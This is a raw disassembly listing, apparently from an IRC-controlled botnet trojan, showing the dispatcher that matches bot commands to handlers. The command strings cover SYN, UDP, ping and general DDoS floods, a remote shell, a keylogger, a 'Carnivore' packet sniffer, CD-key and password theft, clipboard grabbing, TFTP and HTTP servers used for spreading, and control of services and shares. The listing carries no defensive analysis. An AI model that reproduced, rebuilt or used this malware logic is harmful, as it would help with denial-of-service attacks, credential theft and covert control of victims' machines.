loc_40D53D: ; CODE XREF: sub_40C50A+1019�j
push edi
push offset aLogstop ; "logstop"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40D566
push [ebp+esi+var_90]
push 1Ch
push offset aLogList ; "Log list"
push offset aLog ; "[LOG]"
jmp loc_412299
; ---------------------------------------------------------------------------
loc_40D566: ; CODE XREF: sub_40C50A+1042�j
push edi
push offset aRedirectstop ; "redirectstop"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40D58F
push [ebp+esi+var_90]
push 10h
push offset aTcpRedirect ; "TCP redirect"
push offset aRedirect ; "[REDIRECT]"
jmp loc_412299
; ---------------------------------------------------------------------------
loc_40D58F: ; CODE XREF: sub_40C50A+106B�j
push edi
push offset aDdos_stop ; "ddos.stop"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40D5B8
push [ebp+esi+var_90]
push 0Ah
push offset aDdosFlood ; "DDoS flood"
push offset aDdos ; "[DDoS]"
jmp loc_412299
; ---------------------------------------------------------------------------
loc_40D5B8: ; CODE XREF: sub_40C50A+1094�j
push edi
push offset aSynstop ; "synstop"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40D5E1
push [ebp+esi+var_90]
push 0Bh
push offset aSynFlood ; "Syn flood"
push offset aSyn ; "[SYN]"
jmp loc_412299
; ---------------------------------------------------------------------------
loc_40D5E1: ; CODE XREF: sub_40C50A+10BD�j
push edi
push offset aUdpstop ; "udpstop"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40D60A
push [ebp+esi+var_90]
push 0Fh
push offset aUdpFlood ; "UDP flood"
push offset aUpd ; "[UPD]"
jmp loc_412299
; ---------------------------------------------------------------------------
loc_40D60A: ; CODE XREF: sub_40C50A+10E6�j
push edi
push offset aPingstop ; "pingstop"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40D633
push [ebp+esi+var_90]
push 0Eh
push offset aPingFlood ; "Ping flood"
push offset aPing_0 ; "[PING]"
jmp loc_412299
; ---------------------------------------------------------------------------
loc_40D633: ; CODE XREF: sub_40C50A+110F�j
push edi
push offset aTftpstop ; "tftpstop"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40D65C
push [ebp+esi+var_90]
push 4
push offset aServer_3 ; "Server"
push offset aTftp ; "[TFTP]"
jmp loc_412299
; ---------------------------------------------------------------------------
loc_40D65C: ; CODE XREF: sub_40C50A+1138�j
push edi
push offset aFindfilestop ; "findfilestop"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_412286
push edi
push offset aFfstop ; "ffstop"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_412286
push edi
push offset aProcsstop ; "procsstop"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_412271
push edi
push offset aPsstop ; "psstop"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_412271
push edi
push offset aClonestop ; "clonestop"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40D6D9
push [ebp+esi+var_90]
push 17h
push offset aClone ; "Clone"
push offset aClones ; "[CLONES]"
jmp loc_412299
; ---------------------------------------------------------------------------
loc_40D6D9: ; CODE XREF: sub_40C50A+11B5�j
push edi
push offset aSecurestop ; "securestop"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40D702
push [ebp+esi+var_90]
push 19h
push offset aSecure_0 ; "Secure"
push offset aSecure_1 ; "[SECURE]"
jmp loc_412299
; ---------------------------------------------------------------------------
loc_40D702: ; CODE XREF: sub_40C50A+11DE�j
push edi
push offset aScanstop ; "scanstop"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40D72B
push [ebp+esi+var_90]
push 8
push offset aScan ; "Scan"
push offset aScan_0 ; "[SCAN]"
jmp loc_412299
; ---------------------------------------------------------------------------
loc_40D72B: ; CODE XREF: sub_40C50A+1207�j
push edi
push offset aScanstats ; "scanstats"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_41225B
push edi
push offset aStats ; "stats"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_41225B
push edi
push offset aReconnect ; "reconnect"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_41223A
push edi
push offset aR_0 ; "r"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_41223A
push edi
push offset aDisconnect ; "disconnect"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_412218
push edi
push offset aDc ; "dc"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_412218
push edi
push offset aQuit_1 ; "quit"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4121D0
push edi
push offset aQ ; "q"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4121D0
push edi
push offset aStatus ; "status"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_412192
push edi
push offset aS_12 ; "s"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_412192
push edi
push offset aId ; "id"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_41215B
push edi
push offset aI_0 ; "i"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_41215B
push edi
push offset aReboot ; "reboot"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40D879
call sub_409D0C
test eax, eax
mov eax, offset aMainRebootingS ; "[MAIN]: Rebooting system."
jnz short loc_40D84B
mov eax, offset aMainFailedToRe ; "[MAIN]: Failed to reboot system."
loc_40D84B: ; CODE XREF: sub_40C50A+133A�j
push eax
lea eax, [ebp+var_2DC]
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40842D
add esp, 1Ch
jmp loc_40CE3C
; ---------------------------------------------------------------------------
loc_40D879: ; CODE XREF: sub_40C50A+132C�j
push edi
push offset aThreads ; "threads"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_41206A
push edi
push offset aT ; "t"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_41206A
push edi
push offset aAliases ; "aliases"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_41204A
push edi
push offset aAl ; "al"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_41204A
push edi
push offset aLog_0 ; "log"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411F5A
push edi
push offset aLg ; "lg"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411F5A
push edi
push offset aClearlog ; "clearlog"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411F3E
push edi
push offset aClg ; "clg"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411F3E
push edi
push offset aNetinfo ; "netinfo"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411F07
push edi
push offset aNi ; "ni"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411F07
push edi
push offset aSysinfo ; "sysinfo"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411EDC
push edi
push offset aSi ; "si"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411EDC
push edi
push offset aRemov10e ; "remov10e"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411EA2
push edi
push offset aRemov10e2 ; "remov10e2"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411EA2
push edi
push offset aProcs ; "procs"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411D8E
push edi
push offset aPs ; "ps"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411D8E
push edi
push offset aGetcdkeys ; "getcdkeys"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411D64
push edi
push offset aKey ; "key"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411D64
push edi
push offset aUptime ; "uptime"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411CE0
push edi
push offset aUp ; "up"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411CE0
push edi
push offset aDriveinfo ; "driveinfo"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411CC3
push edi
push offset aDrv ; "drv"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411CC3
push edi
push offset aTestdlls ; "testdlls"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411CAA
push edi
push offset aDll ; "dll"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411CAA
push edi
push offset aOpencmd ; "opencmd"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411C63
push edi
push offset aOcmd ; "ocmd"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411C63
push edi
push offset aCmdstop ; "cmdstop"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40DAC4
push [ebp+esi+var_90]
push 7
push offset aRemoteShell ; "Remote shell"
push offset aCmd ; "[CMD]"
jmp loc_412299
; ---------------------------------------------------------------------------
loc_40DAC4: ; CODE XREF: sub_40C50A+15A0�j
push edi
push offset aWho ; "who"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40DB51
cmp [ebp+var_8], ebx
jnz short loc_40DAF4
push ebx
push [ebp+var_4]
push offset aLoginList ; "-[Login List]-"
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40842D
add esp, 14h
loc_40DAF4: ; CODE XREF: sub_40C50A+15CE�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_40DAF9: ; CODE XREF: sub_40C50A+1635�j
cmp [edi], bl
lea eax, [edi+1]
jnz short loc_40DB05
mov eax, offset aEmpty ; "<Empty>"
loc_40DB05: ; CODE XREF: sub_40C50A+15F4�j
push eax
push esi
lea eax, [ebp+var_2DC]
push offset aD_S ; "%d. %s"
push eax
call sub_418D70
push 1
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40842D
add esp, 24h
inc esi
add edi, 80h
cmp esi, 2
jl short loc_40DAF9
push offset aMainLoginListC ; "[MAIN]: Login list complete."
loc_40DB46: ; CODE XREF: sub_40C50A+5C4C�j
call sub_4035E1
pop ecx
jmp loc_41263B
; ---------------------------------------------------------------------------
loc_40DB51: ; CODE XREF: sub_40C50A+15C9�j
push edi
push offset aGetclip ; "getclip"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411C22
push edi
push offset aGc ; "gc"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411C22
push edi
push offset aFlusharp ; "flusharp"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411BF7
push edi
push offset aFarp ; "farp"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411BF7
push edi
push offset aFlushdns ; "flushdns"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411BD3
push edi
push offset aFdns ; "fdns"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411BD3
push edi
push offset aCurrentip ; "currentip"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411B96
push edi
push offset aCip ; "cip"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411B96
push edi
push offset aRloginserver ; "rloginserver"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411A3A
push edi
push offset aRlogin ; "rlogin"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411A3A
push edi
push offset aHttpserver ; "httpserver"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4118C4
push edi
push offset aHttp ; "http"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4118C4
push edi
push offset aTftpserver ; "tftpserver"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411786
push edi
push offset aTftp_0 ; "tftp"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411786
push edi
push offset aCrash ; "crash"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40DCDD
lea eax, [ebp+var_2DC]
push offset aMainCrashingBo ; "[MAIN]: Crashing bot."
push eax
call sub_418D70
cmp [ebp+var_8], ebx
pop ecx
pop ecx
jnz short loc_40DCBC
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40842D
add esp, 14h
loc_40DCBC: ; CODE XREF: sub_40C50A+1794�j
lea eax, [ebp+var_2DC]
push eax
call sub_4035E1
mov [esp+10h+var_10], offset aCrash_0 ; "crash"
push [ebp+esi+var_80]
call sub_419360
jmp loc_4127C7
; ---------------------------------------------------------------------------
loc_40DCDD: ; CODE XREF: sub_40C50A+177C�j
push edi
push offset aFindpass ; "findpass"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4116DF
push edi
push offset aFp ; "fp"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4116DF
push edi
push offset aFofofo2 ; "fofofo2"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4113E4
push edi
push offset aSfofofo2a ; "sfofofo2a"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4113E4
mov edi, [ebp+esi+var_90]
cmp edi, ebx
jz loc_40C97C
push [ebp+arg_8]
push offset aNick_0 ; "nick"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4113CB
push [ebp+arg_8]
push offset aN ; "n"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4113CB
push [ebp+arg_8]
push offset aJoin ; "join"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4113AB
push [ebp+arg_8]
push offset aJ ; "j"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4113AB
push [ebp+arg_8]
push offset aPart_1 ; "part"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411392
push [ebp+arg_8]
push offset aPt ; "pt"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411392
push [ebp+arg_8]
push offset aRaw ; "raw"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_41135B
push [ebp+arg_8]
push offset aR_2 ; "r"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_41135B
push [ebp+arg_8]
push offset aKillthread ; "killthread"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411298
push [ebp+arg_8]
push offset aK ; "k"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411298
push [ebp+arg_8]
push offset aC_quit ; "c_quit"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4111EF
push [ebp+arg_8]
push offset aC_q ; "c_q"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_4111EF
push [ebp+arg_8]
push offset aC_rndnick ; "c_rndnick"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411198
push [ebp+arg_8]
push offset aC_rn ; "c_rn"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411198
push [ebp+arg_8]
push offset aPrefix ; "prefix"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411183
push [ebp+arg_8]
push offset aPr ; "pr"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411183
push [ebp+arg_8]
push offset aOpen_0 ; "open"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411159
push [ebp+arg_8]
push offset aO ; "o"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411159
push [ebp+arg_8]
push offset aS3rv3rfg ; "s3rv3rfg"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411134
push [ebp+arg_8]
push offset aS3rv3rfg2 ; "s3rv3rfg2"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411134
push [ebp+arg_8]
push offset aDns ; "dns"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_41109C
push [ebp+arg_8]
push offset aDn ; "dn"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_41109C
push [ebp+arg_8]
push offset aKillproc ; "killproc"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411070
push [ebp+arg_8]
push offset aKp ; "kp"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411070
push [ebp+arg_8]
push offset aKill ; "kill"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411015
push [ebp+arg_8]
push offset aKi ; "ki"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_411015
push [ebp+arg_8]
push offset aDelete ; "delete"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410FDE
push [ebp+arg_8]
push offset aDel ; "del"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410FDE
push [ebp+arg_8]
push offset aGet_2 ; "get"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410EFD
push [ebp+arg_8]
push offset aGt ; "gt"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410EFD
push [ebp+arg_8]
push offset aList_0 ; "list"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410EE2
push [ebp+arg_8]
push offset aLi ; "li"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410EE2
push [ebp+arg_8]
push offset aVisit ; "visit"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410E04
push [ebp+arg_8]
push offset aV ; "v"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410E04
push [ebp+arg_8]
push offset aMirccmd ; "mirccmd"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410DC9
push [ebp+arg_8]
push offset aMirc ; "mirc"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410DC9
push [ebp+arg_8]
push offset aCmd_0 ; "cmd"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410D7E
push [ebp+arg_8]
push offset aCm ; "cm"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410D7E
push [ebp+arg_8]
push offset aReadfile ; "readfile"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410CF9
push [ebp+arg_8]
push offset aRf ; "rf"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz loc_410CF9
push [ebp+arg_8]
push offset aPsniff_0 ; "psniff"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz loc_40E225
push edi
push offset aOn ; "on"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz loc_40E1ED
push 18h
call sub_416433
test eax, eax
pop ecx
jle short loc_40E11A
push offset aPsniffAlreadyR ; "[PSNIFF]: Already running."
jmp loc_40E361
; ---------------------------------------------------------------------------
loc_40E11A: ; CODE XREF: sub_40C50A+1C04�j
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_8C]
mov [ebp+var_4F0], eax
mov eax, [ebp+var_4]
mov [ebp+var_468], eax
mov eax, [ebp+var_8]
cmp esi, ebx
mov [ebp+var_464], eax
jnz short loc_40E15C
mov esi, offset aFa ; "#fa"
push offset dword_491D84
push esi
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40E15C
mov esi, [ebp+var_8C]
loc_40E15C: ; CODE XREF: sub_40C50A+1C34�j
; sub_40C50A+1C4A�j
push esi
lea eax, [ebp+var_4EC]
push 80h
push eax
call sub_418EF0
lea eax, [ebp+var_2DC]
push offset aPsniffCarnivor ; "[PSNIFF]: Carnivore packet sniffer acti"...
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push 18h
push eax
call sub_4161EB
add esp, 20h
mov [ebp+var_46C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F0]
push ebx
push eax
push offset sub_40B86A
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_46C]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_40E1DC
loc_40E1C6: ; CODE XREF: sub_40C50A+1CD0�j
cmp [ebp+var_460], ebx
jnz loc_4125A2
push 32h
call ds:dword_4942D8
jmp short loc_40E1C6
; ---------------------------------------------------------------------------
loc_40E1DC: ; CODE XREF: sub_40C50A+1CBA�j
call ds:dword_4942F0
push eax
push offset aPsniffFailedTo ; "[PSNIFF]: Failed to start sniffer threa"...
jmp loc_412593
; ---------------------------------------------------------------------------
loc_40E1ED: ; CODE XREF: sub_40C50A+1BF4�j
push edi
push offset aOff ; "off"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz loc_4125A2
push ebx
push 18h
call sub_4163E6
pop ecx
cmp eax, ebx
pop ecx
jle short loc_40E21B
push eax
push offset aPsniffCarniv_0 ; "[PSNIFF]: Carnivore stopped. (%d thread"...
jmp loc_412593
; ---------------------------------------------------------------------------
loc_40E21B: ; CODE XREF: sub_40C50A+1D04�j
push offset aPsniffNoCarniv ; "[PSNIFF]: No Carnivore thread found."
jmp loc_40E361
; ---------------------------------------------------------------------------
loc_40E225: ; CODE XREF: sub_40C50A+1BDF�j
push [ebp+arg_8]
push offset aIdent ; "ident"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz loc_40E2F5
push edi
push offset aOn_0 ; "on"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40E2C0
push 2
call sub_416433
test eax, eax
pop ecx
jle short loc_40E263
push offset aIdentAlreadyRu ; "[IDENT]: Already running."
jmp loc_40E361
; ---------------------------------------------------------------------------
loc_40E263: ; CODE XREF: sub_40C50A+1D4D�j
lea eax, [ebp+var_2DC]
push offset aIdentdServer_0 ; "[IDENTD]: Server running on Port: 113."
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push 2
push eax
call sub_4161EB
add esp, 14h
mov esi, eax
lea eax, [ebp+var_10]
push eax
push ebx
push esi
push offset sub_40823C
push ebx
push ebx
call ds:dword_4942F4
imul esi, 234h
cmp eax, ebx
mov dword_44D06C[esi], eax
jnz loc_4125A2
call ds:dword_4942F0
push eax
push offset aIdentdFailed_0 ; "[IDENTD]: Failed to start server, error"...
jmp loc_412593
; ---------------------------------------------------------------------------
loc_40E2C0: ; CODE XREF: sub_40C50A+1D41�j
push edi
push offset aOff_0 ; "off"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz loc_4125A2
push ebx
push 2
call sub_4163E6
pop ecx
cmp eax, ebx
pop ecx
jle short loc_40E2EE
push eax
push offset aIdentServerSto ; "[IDENT]: Server stopped. (%d thread(s) "...
jmp loc_412593
; ---------------------------------------------------------------------------
loc_40E2EE: ; CODE XREF: sub_40C50A+1DD7�j
push offset aIdentNoThreadF ; "[IDENT]: No thread found."
jmp short loc_40E361
; ---------------------------------------------------------------------------
loc_40E2F5: ; CODE XREF: sub_40C50A+1D2C�j
push [ebp+arg_8]
push offset aKeylog ; "keylog"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz loc_40E477
push edi
push offset aOn_1 ; "on"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz short loc_40E374
push edi
push offset aFile ; "file"
call sub_419360
pop ecx
test eax, eax
pop ecx
jz short loc_40E374
push edi
push offset aOff_1 ; "off"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz loc_4125A2
push ebx
push 1Ah
call sub_4163E6
pop ecx
cmp eax, ebx
pop ecx
jle short loc_40E35C
push eax
push offset aKeylogKeyLogge ; "[KEYLOG]: Key logger stopped. (%d threa"...
jmp loc_412593
; ---------------------------------------------------------------------------
loc_40E35C: ; CODE XREF: sub_40C50A+1E45�j
push offset aKeylogNoKeyLog ; "[KEYLOG]: No key logger thread found."
loc_40E361: ; CODE XREF: sub_40C50A+1C0B�j
; sub_40C50A+1D16�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_418D70
pop ecx
pop ecx
jmp loc_4125A2
; ---------------------------------------------------------------------------
loc_40E374: ; CODE XREF: sub_40C50A+1E11�j
; sub_40C50A+1E22�j
push 1Ah
call sub_416433
test eax, eax
pop ecx
jle short loc_40E387
push offset aKeylogAlreadyR ; "[KEYLOG]: Already running."
jmp short loc_40E361
; ---------------------------------------------------------------------------
loc_40E387: ; CODE XREF: sub_40C50A+1E74�j
mov eax, [ebp+arg_4]
push edi
mov [ebp+var_4F0], eax
mov eax, [ebp+var_4]
push offset aFile_0 ; "file"
mov [ebp+var_468], eax
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40E3B6
mov [ebp+var_464], 1
jmp short loc_40E3BF
; ---------------------------------------------------------------------------
loc_40E3B6: ; CODE XREF: sub_40C50A+1E9E�j
mov eax, [ebp+var_8]
mov [ebp+var_464], eax
loc_40E3BF: ; CODE XREF: sub_40C50A+1EAA�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jnz short loc_40E3E6
mov esi, offset aFfkey ; "#ffKey"
push offset dword_491D88
push esi
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40E3E6
mov esi, [ebp+var_8C]
loc_40E3E6: ; CODE XREF: sub_40C50A+1EBE�j
; sub_40C50A+1ED4�j
push esi
lea eax, [ebp+var_4E8]
push 80h
push eax
call sub_418EF0
lea eax, [ebp+var_2DC]
push offset aKeylogKeyLog_0 ; "[KEYLOG]: Key logger active."
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_2DC]
push 1Ah
push eax
call sub_4161EB
add esp, 20h
mov [ebp+var_4EC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F0]
push ebx
push eax
push offset sub_4085A9
push ebx
push ebx
call ds:dword_4942F4
mov ecx, [ebp+var_4EC]
imul ecx, 234h
cmp eax, ebx
mov dword_44D06C[ecx], eax
jz short loc_40E466
loc_40E450: ; CODE XREF: sub_40C50A+1F5A�j
cmp [ebp+var_460], ebx
jnz loc_4125A2
push 32h
call ds:dword_4942D8
jmp short loc_40E450
; ---------------------------------------------------------------------------
loc_40E466: ; CODE XREF: sub_40C50A+1F44�j
call ds:dword_4942F0
push eax
push offset aKeylogFailedTo ; "[KEYLOG]: Failed to start logging threa"...
jmp loc_412593
; ---------------------------------------------------------------------------
loc_40E477: ; CODE XREF: sub_40C50A+1DFC�j
push [ebp+arg_8]
push offset aNet ; "net"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz loc_40E798
cmp dword_44B790, ebx
jz short loc_40E4A8
cmp dword_44B7B8, ebx
jz short loc_40E4A8
push offset aNetFailedToLoa ; "[NET]: Failed to load advapi32.dll or n"...
jmp loc_40E752
; ---------------------------------------------------------------------------
loc_40E4A8: ; CODE XREF: sub_40C50A+1F8A�j
; sub_40C50A+1F92�j
cmp [ebp+var_C], ebx
jz loc_40E760
mov eax, [ebp+esi+var_8C]
mov [ebp+arg_0], ebx
cmp eax, ebx
mov [ebp+arg_18], eax
jz short loc_40E4D0
push eax
push [ebp+var_C]
call sub_419AB0
pop ecx
mov [ebp+arg_0], eax
pop ecx
loc_40E4D0: ; CODE XREF: sub_40C50A+1FB6�j
push edi
push offset aStart ; "start"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40E536
cmp [ebp+arg_18], ebx
jz short loc_40E50A
push [ebp+arg_0]
push 3
call sub_409EB6
push eax
push offset aS_13 ; "%s"
loc_40E4F6: ; CODE XREF: sub_40C50A+204D�j
; sub_40C50A+2070�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_418D70
add esp, 14h
jmp loc_40E760
; ---------------------------------------------------------------------------
loc_40E50A: ; CODE XREF: sub_40C50A+1FDA�j
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40A15D
add esp, 0Ch
test eax, eax
jz short loc_40E52C
push offset aNetServiceList ; "[NET]: Service list completed."
jmp loc_40E752
; ---------------------------------------------------------------------------
loc_40E52C: ; CODE XREF: sub_40C50A+2016�j
push offset aNetServiceLi_0 ; "[NET]: Service list failed."
jmp loc_40E752
; ---------------------------------------------------------------------------
loc_40E536: ; CODE XREF: sub_40C50A+1FD5�j
push edi
push offset aStop ; "stop"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40E559
push [ebp+arg_0]
push 4
call sub_409EB6
push eax
push offset aS_14 ; "%s"
jmp short loc_40E4F6
; ---------------------------------------------------------------------------
loc_40E559: ; CODE XREF: sub_40C50A+203B�j
push edi
push offset aPause ; "pause"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40E57F
push [ebp+arg_0]
push 5
call sub_409EB6
push eax
push offset aS_15 ; "%s"
jmp loc_40E4F6
; ---------------------------------------------------------------------------
loc_40E57F: ; CODE XREF: sub_40C50A+205E�j
push edi
push offset aContinue ; "continue"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40E5A5
push [ebp+arg_0]
push 6
call sub_409EB6
push eax
push offset aS_16 ; "%s"
jmp loc_40E4F6
; ---------------------------------------------------------------------------
loc_40E5A5: ; CODE XREF: sub_40C50A+2084�j
push edi
push offset aDelete_0 ; "delete"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40E5CB
push [ebp+arg_0]
push 1
call sub_409EB6
push eax
push offset aS_17 ; "%s"
jmp loc_40E4F6
; ---------------------------------------------------------------------------
loc_40E5CB: ; CODE XREF: sub_40C50A+20AA�j
push edi
push offset aShare ; "share"
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40E653
cmp [ebp+arg_18], ebx
jz short loc_40E626
cmp [ebp+var_9C4], bl
jz short loc_40E5FC
push ebx
push [ebp+arg_18]
push 1
call sub_40A29A
push eax
push offset aS_18 ; "%s"
jmp short loc_40E612
; ---------------------------------------------------------------------------
loc_40E5FC: ; CODE XREF: sub_40C50A+20DD�j
push [ebp+esi+var_88]
push [ebp+arg_18]
push ebx
call sub_40A29A
push eax
push offset aS_19 ; "%s"
loc_40E612: ; CODE XREF: sub_40C50A+20F0�j
lea eax, [ebp+var_2DC]
push eax
call sub_418D70
add esp, 18h
jmp loc_40E760
; ---------------------------------------------------------------------------
